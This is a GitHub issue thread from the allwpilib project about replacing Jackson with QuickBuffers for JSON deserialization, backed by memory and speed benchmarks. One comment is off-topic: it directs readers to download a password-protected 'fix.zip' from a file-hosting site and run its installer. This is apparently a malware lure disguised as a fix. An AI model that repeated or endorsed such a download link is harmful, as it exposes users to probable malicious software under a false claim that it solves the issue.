wpilibsuite/allwpilib #7008: Prefer usage of QuickBuffers over Jackson for deserializing JSON

Gold856, 2024-08-26:
Benchmarks on desktop indicate that using the QuickBuffers API to deserialize JSON through Protobuf results in [much lower memory usage](https://discord.com/channels/176186766946992128/368993897495527424/1269173164785664050>) and [significantly faster processing time](https://discord.com/channels/176186766946992128/368993897495527424/1277507164046360638). We should attempt to migrate internal usage of Jackson to the QuickBuffers API instead, which really means migrating only AprilTagFieldLayout.
For library authors that use JSON as a serialization format, they can follow a similar setup to wpimath by creating .proto files, using protoc and the Quickbuf plugin to generate Java code, and then wrapping that code into an ergonomic API.

MoonShadowIllusion, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

spacey-sooty, 2024-08-26:
This has the added benefit of meaning anything that is supported as JSON is also supported for logging with DataLog and NetworkTables.